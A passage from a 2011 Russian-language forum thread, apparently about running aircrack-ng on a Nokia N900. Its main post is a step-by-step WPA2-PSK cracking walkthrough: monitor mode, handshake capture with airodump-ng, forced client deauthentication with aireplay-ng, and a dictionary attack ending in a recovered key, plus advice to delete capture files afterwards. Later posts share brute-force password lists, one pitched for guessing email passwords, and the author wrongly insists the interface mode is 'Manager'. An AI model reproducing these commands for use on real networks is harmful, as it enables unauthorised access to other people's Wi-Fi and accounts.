Re: aircrack
Ну, например, от этого сайта
Правда, тут есть логин по OpenID, если провайдер OpenID поддерживает шифрование, то хорошо
Добавлено: 18.01.2011 15:43:31
Насчёт почты не знаю, наверное, да.
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
Страницы Назад 1 … 5 6 7 8 9 … 15 Далее
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Ну, например, от этого сайта
Правда, тут есть логин по OpenID, если провайдер OpenID поддерживает шифрование, то хорошо
Добавлено: 18.01.2011 15:43:31
Насчёт почты не знаю, наверное, да.
А ты хочешь посимвольный подбор по буквам маленьким или по большим, или по тем и другим, и цифры добавлять со знаками препинания???
Ну давай допустим у тебя будет пароль ololo3
Вот через сколько он его подберет интересно?
Ну давай допустим у тебя будет пароль ololo3
Вот через сколько он его подберет интересно?
Пароль сплошным перебором состоящий из 6 знаков включающих в себя буквы малые, большие, цифры, знаки препинания на частоте 500 занимает 4 дня, на частоте 1100 - 42 часа
Это теоретический расчет... На практике должно быть меньше... Попробую...
По информации из сети: WPA можно взломать только методом прямого перебора. Это связанно с отсутствием постоянного ключа. Единственный способ получить нужную информацию – начать перехват пакетов в момент установки соединения между клиентом и AP. Длина PSK может составлять от 8 до 63 символов, и чем она больше, тем меньше вероятность успешного взлома.
Но для оптимистов и энтузиастов информация выложенная на этом форуме ниже может быть интересной и поучительной...
Итак имеем цель:
Подключиться к Wi-Fi точке использующей WPA2 PSK
Средства для достижения цели:
1. Атакуемый клиент с WPA2 (Wi-Fi точка, в радиусе действия нашего N900 причем не на получение, а на передачу сигнала точке для генерации атаки;
2. МАС клиента: 00:21:91:98:64:C4
3. N900 (с установленным пакетом rootsh, aircrack-ng 1.0);
4. password.lst список паролей по которым будет осуществляться собственно сам подбор пароля;
В случае, если ключ является словарным словом или же менее 8 символов, взлом возможен и не сложен.
Примечание: Отсюда, кстати, понятно, как создать неломаемую сеть – достаточно использовать WPA/WPA2 и ключ длиной 63 байта, состоящий из случайного набора букв, цифр и псевдосимволов.
Полный перебор – занятие долгое. Поскольку требуются серьезные вычисления, компьютер может проверять от 50 до 300 ключей в секунду, в зависимости от мощности процессора. N900 по заявкам знающих челов от 30 до 100 ключей в секунду. Перебор достаточно большого словаря может занять часы, если не дни, а если вы хотите сгенерировать свой собственный файл словаря, который включает в себя все комбинации букв, цифр и псевдосимволов, учтите следующую информацию:
1. Пароль сплошным перебором состоящий из 5 знаков включающих в себя буквы малые, большие, цифры, знаки препинания на частоте 500 Mhz занимает 74 минуты, на частоте 1100 Mhz - 34 минуты
2. Пароль сплошным перебором состоящий из 6 знаков включающих в себя буквы малые, большие, цифры, знаки препинания на частоте 500 Mhz занимает 4 дня, на частоте 1100 Mhz - 42 часа
3. Пароль сплошным перебором состоящий из 7 знаков включающих в себя буквы малые, большие, цифры, знаки препинания на частоте 500 Mhz занимает 10 месяцев, на частоте 1100 Mhz - 5 месяцев...
4.Пароль состоящий из 15 знаков, где есть буквы нижнего и верхнего регистра и цифры, перебором сплошным (без словаря) на частоте 1100 Mhz занял бы 22 473 277 478 161 лет!!!
1-й ШАГ подготовка...
$ root
# ifconfig wlan0 down
- команда отключения или "падения" (кому как удобней на слух) интерфейса wlan0
# iwconfig wlan0 mode Monitor
- команда включение режима монитора wlan0
# ifconfig wlan0 up
- команда "поднятия" интерфейса wlan0
#arodump-ng wlan0
- сканируем пространство на наличие действующих точек Wi-Fi их МАС и Ch
имеем следующий вывод в терминале:
CH 5 ][ Elapsed: 7 mins ][ 2011-01-18 17:04
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSI
00:21:91:98:64:C4 -29 272 2 0 12 54e WPA2 CCMP PSK DSL-
00:1E:58:A5:6F:80 -75 210 1 0 6 11 OPN Leks
00:17:9A:09:D2:1E -87 184 180 0 12 54 . WPA2 CCMP PSK SMKR
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:1F:3C:4A:7A:89 -83 0 - 1 0 14
(not associated) 00:1E:58:A5:6F:80 -83 0 - 1 0 7
00:17:9A:09:D2:1E 00:1F:D0:54:76:22 -1 5 - 0 0 128
Ctrl+C
- останавливает выполнение команды arodump-ng wlan0
Мы видим, что наша атакуемая точка имеет
МАС 00:21:91:98:64:C4 Канал 12 Протокол WPA2 Имя DSL-2640U
Ниже мы так же наблюдаем отсутствие соединения с атакуемой точкой. Три подлючения указанные ниже относятся к другим точкам, которые нам не интересны на данный момент.
2-й ШАГ перехват пакетов с моментом установки безопасного соединения авторизованным пользователем с атакуемой точкой...
#airodump-ng -c 12 --bssid 00:21:91:98:64:C4 -w wpa wlan0
-c 12 – это канал, на котором работает беспроводная сеть
--bssid 00:21:91:98:64:C4 – MAC адрес атакуемой точки. Этот параметр отфильтрует “левый” трафик от других точек в радиусе действия
-w wpa - имя файла, в который мы будут записываться пойманные пакеты
wlan0 – имя нашего беспроводного интерфейса
После этого пошел перехват пакетов с записью их в файл wpa-01.cap...
Вывод будет примерно таков:
CH 12 ][ Elapsed: 25 mins ][ 2011-01-18 17:39 ][ WPA handshake: 00:21:91:98:6
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH
00:21:91:98:64:C4 -35 100 14917 1229 0 12 54e WPA2 CCMP PSK
BSSID STATION PWR Rate Lost Packets Probes
00:21:91:98:64:C4 00:24:2B:E9:6A:60 -61 1e-54e 0 1873
Однако, проблема в том, что как в случае с ломанием кодировке WEP нам нужны пакеты именно с установкой безопасного соединения...
В нашем случае, я включаю нетбук и конекчусь к точке, предполагая, что я какой нибудь пользователь авторизованный...
Вывод на экране такого вида говорит нам, что к нашей сети подключился пользователь с МАС 00:24:2B:E9:6A:60 - это в принципе мой нетбук...
BSSID STATION PWR Rate Lost Packets Probes
00:21:91:98:64:C4 00:24:2B:E9:6A:60 -61 1e-54e 0 1873
Столбик #Data говорит нам о том, что пошел обмен пакетами с пользователем которые мы перехватили... Ниже Packets говорит о том, что именно этот пользователь (мой нетбук обменялся пакетами с точкой)...
Но вот вопрос... Поймали мы те пакеты где была собственно авторизация пользователя... А может мы начали перехват, когда он уже был подключен и авторизован... И дабы не ждать ни повторного подключения ни кого то еще, лучше сделаем атаку...
3-й ШАГ используем aireplay-ng, для отключения подсоединенного клиента (нетбука) и вынуждаем его заново пройти процедуру "аутентификации"
Для этого тапаем на вверх Терминала и выбираем СОЗДАТЬ...
В открывшемся новом окне терминала набираем следующее:
$ root
# aireplay-ng -0 5 -a 00:21:91:98:64:C4 -c 00:24:2B:E9:6A:60 wlan0
-0 - означает деаутентификацию
5 – количество деаутентификационных пакетов по умолчанию ставят 1 но у меня на 1 не прорезает, можно увеличить по своему усмотрению...
-a 00:21:91:98:64:C4 – MAC-адрес атакуемой точки
-c 00:24:2B:E9:6A:60 – MAC-адрес отсекаемого клиента, в нашем случае моего нетбука
wlan0 – имя нашей беспроводной карточки.
Вывод такой:
17:33:29 Waiting for beacon frame (BSSID: 00:21:91:98:64:C4) on channel 12
17:33:29 Sending 64 directed DeAuth. STMAC: [00:24:2B:E9:6A:60] [ 0| 0 ACKs]
17:33:30 Sending 64 directed DeAuth. STMAC: [00:24:2B:E9:6A:60] [ 0| 0 ACKs]
17:33:32 Sending 64 directed DeAuth. STMAC: [00:24:2B:E9:6A:60] [ 0| 1 ACKs]
17:33:33 Sending 64 directed DeAuth. STMAC: [00:24:2B:E9:6A:60] [ 1| 1 ACKs]
17:33:33 Sending 64 directed DeAuth. STMAC: [00:24:2B:E9:6A:60] [ 0| 0 ACKs]
Атака состоялась, повторная аутентификация прошла, пакеты пойманы
Теперь мы успокоились по поводу того что у нас все необходимые пакеты есть, а в нашем случае с избытком...
Останавливаем выполнение команды в первом терминале сочетанием клавиш Ctrl+C
4-й ШАГ запускаем aircrack-ng и ломаем PSK ключ
Цель данного шага – попытаться взломать PSK ключ путем подбора по словарю.
Небольшой словарик идет в комплекте с этим постом чисто для опыта password.lst, более объемные словари можно легко найти в сети или сгенерировать самостоятельно при помощи множества программ.
Примечание: Естественно, в этот маленький словарь эксперементальный, я включил свой реальный ключик... Цель-проверить работоспособность программы... Позже отпишусь по реальному взлому без известного пароля...
# aircrack-ng -w password.lst -b 00:21:91:98:64:C4 wpa*.cap
password.lst - собственно сам текстовый файлик с паролями в столбик с расширением lst находиться должен в папке /root, или в другой но тогда указывать полное имя /home/user/MyDocs/password.lst - я не пробовал этот вариант у меня лежит в /root
wpa*.cap - маска файла, который будет собственно и ломаться располагается опять же в /root
-b 00:21:91:98:64:C4 - собственно к чему плдбираем авторизационный ключик
Вывод примерно таков:
Opening wpa-01.cap
Reading packets, please wait...
Aircrack-ng 1.0
[00:00:00] 4 keys tested (34.92 k/s)
Current passphrase: ddF769viIwbeLnH
KEY FOUND! [ ddF769viIwbeLnH ]
KEY FOUND! [ ddF769viIwbeLnH ]
Master Key : 38 41 96 0A 34 EF B0 EF 7E 6C 1E 63 9F EA 8A B2
EF 1E 94 8D 61 E9 12 03 58 F1 81 05 F1 2B 25 17
Transient Key : C6 C2 3B AE 0D F5 A3 F8 E6 B0 24 D3 C2 89 CD 39
24 23 BC 77 E3 63 7B A4 A1 5B 0E ED E2 74 60 AE
45 2B 38 EC F9 1C 08 BD 1F EB 02 BC E4 4E BD A9
F9 2C A4 15 D0 BD F3 6C 9F 0E D9 29 5F 32 4C 0A
EAPOL HMAC : 5F 0A A7 5F 7E 6F DD DB 44 87 85 F2 05 C6 B5 5D
Ура!!! Мы взломали WPA2...
Совсем забыл... После взлома не забудьте перевести свою сетевую карточку в режим Manager
$ root
# ifconfig wlan0 down
# iwconfig wlan0 mode Manager
# ifconfig wlan0 up
Еще забыл сказать...
Если взлом произошел успешно, незабудьте почистить /root
в терминале вводим:
$ root
# mc
В МС заходим в папку /root хотя по умолчанию вы там и окажитесь и ищем файлы wpa-01.cap, wpa-01.csv, wpa-01.kismet.csv? wpa-01.kismet.netxml
Выделяем их зажатым Shift+Синяя стрелка и кнопочка вправа...
Жмем F8 и потом подтверждаем удаление...
Надо бы включение и выключение WiFi в режим мониторинга в скриптик записать мелкий )
Dominic
Кстати, а как ты узнаешь мак адресс точки?Я скачал по WiFiEye, но она у меня не работает почему то
Не в режиме мониторинг, не в моддинг или как его там
Кстати, а как ты узнаешь мак адресс точки?
Это и есть 1-й шаг.
Добавлено: 19.01.2011 01:54:00
Manager
Вообще-то, managed.
Надо бы включение и выключение WiFi в режим мониторинга в скриптик записать мелкий )
Dominic
Честно говоря я скриптиком и включаю монитор и отключаю...
Но здесь решил его не приводить... Только запутаю людей начинающих... Да и команды руками вводить полезно... По крайней мере на первоначальном этапе...
Кстати, а как ты узнаешь мак адресс точки?Я скачал по WiFiEye, но она у меня не работает почему то
Не в режиме мониторинг, не в моддинг или как его там
А WiFiEye у тебя работать не будет пока... Ты же сам командами ifconfig wlan0 down и iwconfig wlan0 mode Monitor "уронил" сетевой интерфейс и переключил его в МОНИТОР...
А нафига тебе WiFiEye???
Он же в режиме мониторинга при вводе команды: airodump-ng wlan0 - выдает тебе мак адреса точек в радиусе действия это первая часть таблицы... Вторая часть таблицы показывает, кто подключен к этим самым МАС адресам...
Добавлено: 19.01.2011 03:02:01
Вообще-то, managed.
Вообще то: Manager
Dominic, http://linux.die.net/man/8/iwconfig
The mode can be Ad-Hoc (network composed of only one cell and without Access Point), Managed (node connects to a network composed of many Access Points, with roaming), Master (the node is the synchronisation master or acts as an Access Point), Repeater (the node forwards packets between other wireless nodes), Secondary (the node acts as a backup master/repeater), Monitor (the node is not associated with any cell and passively monitor all packets on the frequency) or Auto.
Dominic, http://linux.die.net/man/8/iwconfig
я РУССКИЙ... Английского слова не понимаю... Еще раз говорю, при работе с программой в команде стоит Monitor или Manager... А если поставишь Managed - посмотри сам что получишь в ответ от системы...
я РУССКИЙ... Английского слова не понимаю
Нашёл, чем гордиться.
http://manpages.ylsoftware.com/dokuwiki/man/iwconfig_8
Я не совсем понял... Ты добадаться решил или считаешь реально что между твоим Managed и моим Manager есть существенная разница при юзании этого метода... Уверен, что кроме Manager еще кучу всего можно будет туда вписать и будут работать... И что? Manager как режим работает-а больше мне и не нужно... А с твоим Managed у меня сеть не работает... Может конечно руки кривые, а может карма такая... В любом случае, мой вариант мне удобней чем твой...
Нашел в сети полезный password-list...
Русские слова набранные при английской раскладке клавиатуры...
По отзывам пользователей самый более-менее соответствующий из всех для подбора пороля к электронным почтам и прочему... Думаю для этой проги и WiFiTe сгодится в самый раз...
Dominic буду тебе благодарен, если поделишься еще словарями
Вот пасс лист сделал себе для брута WPA, в нем 6751803 различных паролей спец. для этого.
Делюсь с вами http://upwap.ru/1244121
Форум работает на PunBB, при поддержке Informer Technologies, Inc
Currently installed 6 official extensions. Copyright © 2003–2009 PunBB.
Сгенерировано за 0.151 секунды (98% PHP — 2% БД) 9 запросов к базе данных